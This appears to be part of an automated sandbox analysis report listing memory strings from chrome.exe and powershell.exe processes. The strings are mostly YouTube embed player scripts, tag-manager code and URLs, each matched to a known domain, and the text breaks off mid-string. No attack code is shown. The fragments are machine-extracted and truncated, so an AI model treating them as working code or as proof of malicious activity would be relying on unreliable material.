                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: this.dF.WD&&(B.authuser=this.dF.WD);this.dF.pageId&&(B.pageid=this.dF.pageId);isNaN(this.cryptoPeriodIndex)||(B.cpi=this.cryptoPeriodIndex.toString());var h=(h=/_(TV|STB|GAME|OTT|ATV|BDP)_/.exec(g.Va()))?h[1]:"";h==="ATV"&&(B.cdt=h);this.V=B;this.V.session_id=R;this.N=!0;this.U.flavor==="widevine"&&(this.V.hdr="1");this.U.flavor==="playready"&&(z=Number(zk(z.experiments,"playready_first_play_expiration")),!isNaN(z)&&z>=0&&(this.V.mfpe=""+z),this.N=!1);z="";g.tc(this.U)?NE(this.U)?(R=T.U)&&(z="https://www.youtube.com/api/drm/fps?ek="+ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: tionFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340949325.000028EC067D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: unction(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: urrentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: var M6={};var HF7={X2:[{RD:/Unable to load player module/,weight:20},{RD:/Failed to fetch/,weight:500},{RD:/XHR API fetch failed/,weight:10},{RD:/JSON parsing failed after XHR fetch/,weight:10},{RD:/Retrying OnePlatform request/,weight:10},{RD:/CSN Missing or undefined during playback association/,weight:100},{RD:/Non-recoverable error. Do not retry./,weight:0},{RD:/Internal Error. Retry with an exponential backoff./,weight:0},{RD:/API disabled by application./,weight:0}],Zz:[{callback:GDP,weight:500}]};var Pfr=/[&\?]action_proxy=1/,$el=/[&\?]token=([\w-]*)/,xeX=/[&\?]video_id=([\w-]*)/,vFY=/[&\?]index=([\d-]*)/,DeP=/[&\?]m_pos_ms=([\d-]*)/,KYd=/[&\?]vvt=([\w-]*)/,Uez="ca_type dt el flash u_tz u_his u_h u_w u_ah u_aw u_cd u_nplug u_nmime frm u_java bc bih biw brdim vis wgl".split(" "),kDB="www.youtube-nocookie.com youtube-nocookie.com www.youtube-nocookie.com:443 youtube.googleapis.com www.youtubeedu.com www.youtubeeducation.com video.google.com redirector.gvt1.com".split(" "),QdB={android:"ANDROID", equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: var TH=function(a,b,c,d,e){var f=RE("fsl",c?"nv.mwt":"mwt",0),g;g=c?RE("fsl","nv.ids",[]):RE("fsl","ids",[]);if(!g.length)return!0;var h=WE(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);O(121);if(m==="https://www.facebook.com/tr/")return O(122),!0;h["gtm.elementUrl"]=m;h["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(h["gtm.interactedFormName"]=a.getAttribute("name"));e&&(h["gtm.formSubmitElement"]=e,h["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!nD(h,pD(b, equals www.facebook.com (Facebook)
                                  Source: powershell.exe, 00000022.00000002.1908768239.0000028FCF1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF263000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com=1 equals www.linkedin.com (Linkedin)
                                  Source: chrome.exe, 00000000.00000002.2502048114.000028EC06D54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489657256.000028EC03E9C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2476559206.000028EC02E3C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2502757759.000028EC06E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2502757759.000028EC06E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com(N equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2470544813.000028EC02604000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2347774533.000028EC06454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2498572805.000028EC05C20000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491141569.000028EC04034000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com0 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2476559206.000028EC02E3C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467230860.000028EC0223C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com@Z equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504440794.000028EC078DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.comED equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2489657256.000028EC03E9C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489024413.000028EC03E2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485567217.000028EC03804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.comL equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.comd.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2470845062.000028EC026BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.come.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2480846916.000028EC03334000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.commcaontent-producer.web.app equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.comofpalmlakkmbjdnl equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2467230860.000028EC0223C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.comq equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2343629747.000028EC062AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378591472.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323044133.000028EC04024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com|@G equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: xmlhttprequest>6https://www.youtube.com/youtubei/v1/log_event?alt=json7 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: yOb=function(B,z){if(!B.T["0"]){var T=new N_("0","fakesb",{video:new uF(0,0,0,void 0,void 0,"auto")});B.T["0"]=z?new XU(new g.QP("http://www.youtube.com/videoplayback"),T,"fake"):new Lj(new g.QP("http://www.youtube.com/videoplayback"),T,new PL(0,0),new PL(0,0))}}; equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2394042539.000028EC03558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: yer_ias.vflset/en_US/base.js\" name=\"player/base\" nonce=\"x3amAjrbTQzP1ftESc85Hw\"></script><script nonce=\"\">writeEmbed();</script><script nonce=\"\">if (window.ytcsi) {ytcsi.infoGel({serverTimeMs: 58.0 }, '');}</script><noscript><div class=\"player-unavailable\"><h1 class=\"message\">An error occurred.</h1><div class=\"submessage\"><a href=\"https://www.youtube.com/watch?v=gobWGqPjLSQ\" target=\"_blank\">Try watching this video on www.youtube.com</a>, or enable JavaScript if it is disabled in your browser.</div></div></noscript></body>","favicon":"","currentUrl":"https://fountainofhealth.ca/en","listArrString":[null,"https://www.youtube.com/watch?v=gobWGqPjLSQ","https://www.youtube.com/watch?v=gobWGqPjLSQ&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F"],"imgArrString":["https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws|data:image/png;base64,AA==","https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADGCAYAAAAT+OqFAAAAdklEQVQoz42QQQ7AIAgEF/T/D+kbq/RWAlnQyyazA4aoAB4FsBSA/bFjuF1EOL7VbrIrBuusmrt4ZZORfb6ehbWdnRHEIiITaEUKa5EJqUakRSaEYBJSCY2dEstQY7AuxahwXFrvZmWl2rh4JZ07z9dLtesfNj5q0FU3A5ObbwAAAABJRU5ErkJggg==","https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws|data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGVuYWJsZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: yt3.ggpht.comtionFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: z.customBaseYoutubeUrl:B.BASE_YT_URL)||"")||lYK(this.yl)||this.protocol+"://www.youtube.com/";b=z?z.eventLabel:B.el;R="detailpage";b==="adunit"?R=this.W?"embedded":"detailpage":b==="embedded"||this.J?R=b9(R,b,L6Y):b&&(R="embedded");this.XE=R;PAY();b=null;R=z?z.playerStyle:B.ps;W=g.F5(CiP,R);!R||W&&!this.J||(b=R);this.playerStyle=b;this.X=g.F5(CiP,this.playerStyle);this.houseBrandUserStatus=z==null?void 0:z.houseBrandUserStatus;this.UE=this.X&&this.playerStyle!=="play"&&this.playerStyle!=="jamboard"; equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: z=this.api.K();B=this.api.getVideoData();var T="";z.Y||(z=g.Of(z),z.indexOf("www.")===0&&(z=z.substring(4)),T=g.ev(B)?"Watch on YouTube Music":z==="youtube.com"?"Watch on YouTube":g.Ix("Watch on $WEBSITE",{WEBSITE:z}));this.updateValue("title",T)}; equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501891473.000028EC06D1C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2353212423.000028EC07C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2353212423.000028EC07C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}[] equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501891473.000028EC06D1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}mic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501891473.000028EC06D1C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}CuE23jf8bkHaX equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"if (document.fonts && document.fonts.load) {document.fonts.load(\"400 10pt Roboto\", \"E\"); document.fonts.load(\"500 10pt Roboto\", \"E\");}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2393532398.000028EC063EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}",\"rk\",\"mk\"],[[[[\"c\"],[null,1],[null,0],[\"O43z0dpjhgX20SCx4KAo\"],[\"CLEn\"]],[null,800.1000000000058]]]],[\"/client_streamz/bg/po/csc\",null,[\"cs\",\"mk\"],[[[[null,2],[\"CLEn\"]],[1]]]],[\"/client_streamz/bg/po/ctav\",null,[\"av\",\"mk\"],[[[[\"m\"],[\"CLEn\"]],[1]]]]]]",null,null,null,null,null,null,14400,null,null,null,null,null,1]],"1747926392073"] equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342874633.000028EC06378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}95078]]"],null,null,null,null,1]],"1747926392079"] equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2319886197.000028EC06310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var 